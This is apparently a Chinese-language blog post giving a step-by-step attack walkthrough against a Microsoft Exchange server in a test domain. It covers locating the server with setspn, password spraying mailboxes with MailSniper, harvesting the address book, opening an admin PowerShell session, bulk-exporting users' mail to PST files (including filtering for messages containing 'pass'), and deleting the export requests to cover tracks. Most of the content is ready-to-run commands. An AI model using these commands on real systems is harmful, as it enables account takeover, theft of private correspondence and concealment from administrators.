exchange实战

11 篇文章 0 订阅

未得到exchange服务器权限

确定exchange服务器ip地址

setspn -T example.domain.com -F -Q */* | findstr exchange

在这里插入图片描述

MailSniper

爆破用户名和密码
爆破Exchange邮箱用户名密码,为了防止账号被锁定,所以我们使用密码喷洒攻击,即只使用一个密码来碰撞用户名

Invoke-PasswordSprayEWS -ExchHostname WIN-R6M7IQRLCGA.hdh.com -UserList user.txt -Password xxxxxx -Threads 10 

在这里插入图片描述
在这里插入图片描述
成功爆破出密码,但是我结果写入文件失败了,这些报错不知道怎么回事,不过可以正常爆破密码
而且用户名格式不一样也能爆破出来,就是结果导出有问题
在这里插入图片描述
获取邮箱通讯录
在获取一个邮箱账号密码后,可以使用MailSniper收集通讯录,当拿到通讯录后,可以再次利用上述爆破手段继续尝试弱密码,但是记住,密码次数不要太多,很有可能会造成域用户锁定
Get-GlobalAddressList -ExchHostname WIN-R6M7IQRLCGA.hdh.com -UserName hdh\wahaha -Password xxxxxx -OutFile address-list.txt
在这里插入图片描述
这样用户就枚举出来了

得到exchange服务器权限后

使用PSSession连接Exchange服务器

$User = "hdh\administrator"
$Pass = ConvertTo-SecureString -AsPlainText xxxxxxx -Force
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Pass
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://WIN-R6M7IQRLCGA.hdh.com/PowerShell/ -Authentication Kerberos -Credential $Credential
Import-PSSession $Session -AllowClobber

在这里插入图片描述
查看PSSession

Get-PSSession

删除PSSession

Remove-PSSession $Session

测试命令(获得所有邮箱用户):

#获得所有用户
Get-Mailbox

以下是在exchange服务器上进行操作的没有使用远程PSSession去执行,实战中需要PSSession去执行

导出数据及其清除

页面导出在这里插入图片描述
exchange shell导出
1.将用户添加到角色组”Mailbox Import Export”
在这里插入图片描述
2.重新启动exchange shell
否则不能使用New-MailboxexportRequest
3.导出邮件并保存
(1)导出指定用户的所有邮件,保存到Exchange服务器的c:\test

$User = "administrator"
New-MailboxexportRequest -mailbox $User -FilePath ("\\localhost\c$\test\"+$User+".pst")

在这里插入图片描述
(2)筛选出指定用户的wahaha中包含单词pass的邮件,保存到Exchange服务器的c:\test

$User = "wahaha"
New-MailboxexportRequest -mailbox $User -ContentFilter {(body -like "*pass*")} -FilePath ("\\localhost\c$\test\"+$User+".pst")

在这里插入图片描述
(3)导出所有邮件,保存到Exchange服务器的c:\test

Get-Mailbox -OrganizationalUnit Users -Resultsize unlimited |%{New-MailboxexportRequest -mailbox $_.name -FilePath ("\\localhost\c$\test\"+($_.name)+".pst")}

在这里插入图片描述
可以看到wahaha时间不是最新,因为wahaha不在Users组中,在安全组中

查看邮件导出请求

#粗略查看
Get-MailboxExportRequest

在这里插入图片描述

#精准查看
Get-MailboxExportRequest|fl

在这里插入图片描述
删除具体的某个导出请求:(以上图第一个wahaha为例)
注意:这两个命令依次输入才可以成功删除,截图未全

Remove-MailboxExportRequest -RequestQueue "Mailbox Database 1864638920" -RequestGuid 7c9ca813-22b5-43e7-84f5-0fe69682bea3 -Confirm:$false
Remove-MailboxExportRequest -Identity 'hdh.com/Microsoft Exchange Security Groups/wahaha\MailboxExport' -Confirm:$false

在这里插入图片描述
可以看到wahaha的Mailbox Database 1864638920删除请求已经删掉
删除所有导出请求

Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$false

在这里插入图片描述
可以看到全部删除成功

查看指定人指定日期内邮件

#查看发件人administrator@hdh.com2019119:00至今发送的所有邮件的相关信息(包括发件人,收件人和邮件主题)Get-MessageTrackingLog -Start "01/11/2019 09:00:00" -Sender "administrator@hdh.com"

在这里插入图片描述
参考:https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值